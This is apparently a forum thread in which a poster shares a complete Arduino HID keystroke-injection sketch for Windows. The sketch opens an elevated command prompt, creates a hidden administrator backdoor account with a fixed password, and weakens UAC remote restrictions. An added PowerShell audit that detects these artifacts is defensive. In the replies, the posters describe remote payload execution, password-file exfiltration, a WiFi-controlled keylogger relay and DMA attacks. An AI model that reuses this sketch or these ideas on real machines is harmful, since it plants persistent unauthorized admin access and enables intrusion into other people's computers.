
Topic: Simple HID Attack Project (for Windows PCs) (Read 876 times)

jayxd116

Nov 18, 2016, 06:45 pm Last Edit: Nov 18, 2016, 07:00 pm by jayxd116 Reason: Addendum
Computers almost never perform a check on HIDs connected to the computer like a mouse, keyboard or joystick because, as the name implies (Human Interface Device), it's supposed to take inputs from that device without any questions because they're direct inputs from the user.

Imagine if your computer wouldn't trust your mouse: "Excuse me Mr. User, I don't think that's a polite gesture you just used; as the operating system I hereby refuse to process your input."

Anyway, so the OS must give unquestioned privilege to HIDs unless it can tell human users from bots. Technically, your computer will accept characters from your keyboard at a rate of more than 1000 wpm (depending on how the device is configured). Though no one has done that before without smashing the keyboard or acquiring mutations that grant superhuman abilities, it's still possible (for a machine, of course) to "type" at those phenomenal speeds.

So, what does this mean? Trust from the OS + High speed character rates + enslavable typist, er.. machine = Hacking opportunities. For this project, I'll be using Windows as the target OS.

This project is intended for educational purposes only. I strongly advise hackers to use this project only on their own computers or on devices they have been given permission to use.


Code:
#include <Keyboard.h>

//For the Arduino DUE, after uploading the code through the Programming port, transfer the cable to
//the Native USB port
//After letting the board run this script on your computer, make sure to delete the hidden user
//through the command line as it will not appear in the Control Panel. I will attach a batch file to
//undo this script

const String BackdoorUsername = "Hidden_User";
const String BackdoorPassword = "password123";

//Type your commands here, one command per line.
//(PROGMEM dropped from this declaration: String objects are constructed at run time and
// cannot live in flash. On the Due the PROGMEM macro is a no-op, but on AVR boards the
// original declaration would not compile.)
const String myScript[] = {
                                    
//Example script to create a hidden backdoor in a Windows PC and enable Administrative shares
"net user " + BackdoorUsername + " " + BackdoorPassword + " /add",
"net localgroup Administrators " + BackdoorUsername + " /add",
"net accounts /maxpwage:unlimited",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v " + BackdoorUsername + " /t REG_DWORD /d 0 /f /reg:64",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f /reg:64"


                                   };

//Number of commands, derived from the array so it can never go out of sync with it
const int numLines = sizeof(myScript) / sizeof(myScript[0]);

//Append all commands into one line of code each separated with an "&"
String constructCommandString(const String * str_arr, int sz){
  String finalString = "";

  for (int i = 0 ; i < sz - 1; i++){
    finalString += (str_arr[i] + " & ");
  }

  return finalString + str_arr[sz - 1] + " & exit";
}

void hitEnter(){                    // Send Enter
  Keyboard.releaseAll();
  Keyboard.press(0x0A);             // 0x0A ('\n') maps to the Return key in the Keyboard
  delay(20);                        // library's ASCII table, i.e. the same as KEY_RETURN
  Keyboard.release(0x0A);
}

void sendCommand(String cmd){       // Send a command to an active console
  Keyboard.releaseAll();
  delay(100);
  Keyboard.print(cmd);
  delay(200);
  hitEnter();
}
/*
void openApp(String app){
  Keyboard.releaseAll();          
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('r');              // Winkey + R to open Run dialog box
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  Keyboard.print(app);              // Types in the app filename and Enter
  hitEnter();                       //
}
*/
void openAdminCMD(){ //Works for Windows 8, 8.1 and 10 only
  Keyboard.releaseAll();
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('x');              // Sends a WinKey + X key combination
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  
  Keyboard.press('a');              //
  delay(20);                        // Shortcut letter for Administrator CMD
  Keyboard.release('a');            //
  
  delay(3000);                      // Wait until Administrator Prompt shows up

  Keyboard.press(KEY_LEFT_ARROW);   //
  delay(50);                        // Automatically selects Yes
  hitEnter();                       //
}

/*
void exitWindowsApp(){
  Keyboard.press(KEY_LEFT_ALT);     //
  delay(20);                        //
  Keyboard.press(' ');              // ALT + SPACE combination top open Window options
  Keyboard.releaseAll();            //
  delay(50);                        //
  
  Keyboard.press('c');              //
  delay(50);                        // C for close
  Keyboard.release('c');            //
}
*/
void executePWN(){
  //openApp("cmd");                 //
  openAdminCMD();                   // Current script requires an elevated cmd
  
  delay(200);                       // Delays are necessary to avoid typing before the Window appears
  
  sendCommand(constructCommandString(myScript, numLines));
  
  delay(50);
}

void setup() {
  pinMode(LED_BUILTIN, OUTPUT);
  digitalWrite(LED_BUILTIN, LOW);
  
  Keyboard.begin();
  
  delay(1000);
  executePWN();
}

void loop() {
  digitalWrite(LED_BUILTIN, HIGH);
  delay(80);
  digitalWrite(LED_BUILTIN, LOW);
  delay(80);
}


Addendum: Edit the backdoor removal batch file with a text editor according to the username you chose. I used "Power_User" in the script file, replace all occurrences with the username you've chosen.
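The sketch above leaves a small, fixed set of artifacts on the target: a new local account, an extra member of the local Administrators group, an unlimited machine-wide maximum password age, a zero-valued entry under SpecialAccounts\UserList, and LocalAccountTokenFilterPolicy set to 1. The following PowerShell audit is an added example (not part of the original post and not the author's removal batch file); it checks an elevated Windows 8/10/11 host for exactly those artifacts plus the Security-log events that account creation and group changes generate. It assumes the Microsoft.PowerShell.LocalAccounts and PnpDevice modules are available, that the Security log is readable, and that `net accounts` prints its output in English; the function name, the `$ExpectedAdmins` baseline and the 24-hour lookback are my own choices.

```powershell
function Find-HidInjectionArtifacts {
    [CmdletBinding()]
    param(
        # Baseline of members expected in the local Administrators group (assumption: edit for your host)
        [string[]]$ExpectedAdmins = @("$env:COMPUTERNAME\Administrator"),
        # How far back to search the Security log for account/group changes
        [int]$LookbackHours = 24
    )

    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Accounts hidden from the logon screen and Control Panel: a REG_DWORD named after
    #    the account with value 0 under SpecialAccounts\UserList. Legitimate software rarely sets this.
    $userListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (Test-Path $userListKey) {
        $props = Get-ItemProperty -Path $userListKey
        foreach ($p in $props.PSObject.Properties) {
            # Skip the PSPath/PSParentPath/... metadata that Get-ItemProperty adds
            if ($p.Name -notlike 'PS*' -and $p.Value -eq 0) {
                $findings.Add("Hidden account entry '$($p.Name)' = 0 under SpecialAccounts\UserList")
            }
        }
    }

    # 2. LocalAccountTokenFilterPolicy = 1 switches off UAC remote restrictions, so any local
    #    administrator gets a full token over the network (C$/ADMIN$ shares become reachable).
    $policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $tokenPolicy = (Get-ItemProperty -Path $policyKey -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
    if ($tokenPolicy -eq 1) {
        $findings.Add('LocalAccountTokenFilterPolicy is 1 (UAC remote restrictions disabled)')
    }

    # 3. Local Administrators membership compared against the baseline.
    $admins = Get-LocalGroupMember -Group 'Administrators' | Select-Object -ExpandProperty Name
    foreach ($a in $admins) {
        if ($ExpectedAdmins -notcontains $a) {
            $findings.Add("Unexpected local Administrators member: $a")
        }
    }

    # 4. Machine-wide password policy: "net accounts /maxpwage:unlimited" shows up here.
    #    (Assumption: English-language output of net accounts.)
    $maxAgeLine = (net accounts) | Where-Object { $_ -match 'Maximum password age' }
    if ($maxAgeLine -match 'Unlimited') {
        $findings.Add("Maximum password age is unlimited: $($maxAgeLine.Trim())")
    }

    # 5. Security log: 4720 = user account created, 4732 = member added to a security-enabled
    #    local group. A 4720 followed within seconds by a 4732 for Administrators, with nobody
    #    at the console, is what scripted keystroke injection looks like in the log.
    $since = (Get-Date).AddHours(-$LookbackHours)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $firstLine = ($e.Message -split "`n" | Select-Object -First 1).Trim()
        $findings.Add("Security event $($e.Id) at $($e.TimeCreated): $firstLine")
    }

    # 6. Heuristic: an injector enumerates as an ordinary keyboard, so a single-user workstation
    #    that suddenly reports more than one present keyboard deserves a look.
    $keyboards = @(Get-PnpDevice -Class Keyboard -PresentOnly -ErrorAction SilentlyContinue)
    if ($keyboards.Count -gt 1) {
        $names = ($keyboards | ForEach-Object { $_.FriendlyName }) -join '; '
        $findings.Add("Multiple keyboards present ($($keyboards.Count)): $names")
    }

    return $findings
}

# Usage: run from an elevated PowerShell session.
$results = Find-HidInjectionArtifacts
if ($results.Count -eq 0) { Write-Output 'No indicators found.' }
else { $results | ForEach-Object { Write-Output "[!] $_" } }
```

Cleaning up after the sketch means reversing each artifact the audit reports: `net user <name> /delete` for the account, `reg delete` of the two values the sketch added, and restoring the maximum password age with `net accounts /maxpwage:<days>`. For prevention, Windows Device Installation Restrictions (Group Policy, Computer Configuration > Administrative Templates > System > Device Installation) can block new devices in the Keyboard or HIDClass setup classes, and enabling an audit policy for account management is what makes events 4720 and 4732 appear in the Security log in the first place.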

xl97

nice project.

However, this has been done many times before (but a nice twist on the account creation).

There are MANY variants of the RubberDucky project...

I myself made one not too long ago that also adds in an ESP8266 module (acting as a captive portal) to serve up my GUI page so I can execute (whatever pre-made actions) remotely from a cell phone/tablet, etc.

We used it to play a joke on a fellow co-worker,

sending text and moving his mouse all remotely through the ESP >> Pro-Micro  >> PC  toolchain


but it could have easily reached out to the internet and executed a (malicious) payload if desired, or grabbed any number of protected/password files and sent them to a remote location for cracking later on, etc.

jayxd116

Yeah. It is my first project about HIDs. I have another project which I will be posting soon which involves using two HIDs (I used two because the MCUs at my disposal each only provide one USB interface) to serve as an MITM between a computer and a device such as a mouse or keyboard.

There's a WiFi module included which allows remote access to the device.

The first MCU acts as a device to a computer; the other one acts as a host for a mouse/keyboard, which relays the signals to the device slave. The slave is connected to the WiFi module, which receives commands from a TCP console. It can be switched between three modes: Listen, Pwn and Relay. The Listen mode is basically a keylogger; the Pwn mode intercepts the user's input and can be set to trigger a certain action whenever a user presses a key or a combination of keys or words (for example, I set up a prank in the office which listens to the keystrokes of the user and, if they have typed the words porn, sex, nude, etc., triggers an action to open Notepad and then type the words "These are unholy words, your keyboard forbids it.") lol.

I have another advanced project, about USB, currently under research which involves DMA attacks on a computer system; I'm still working on the assembly code. I'm just going to use an Arduino for the front-end; the core of the project will be based on an FPGA. In my experience, it's fairly easy to gain DMA access to a USB controller which does not have an IOMMU, and for USB versions 3.0 and 3.1 it is almost a cakewalk since they allow DMA access under certain circumstances. Basically, when you have gained DMA access, you have just about any access to the computer. Since it's residing below the OS, you can circumvent the OS's security measures.

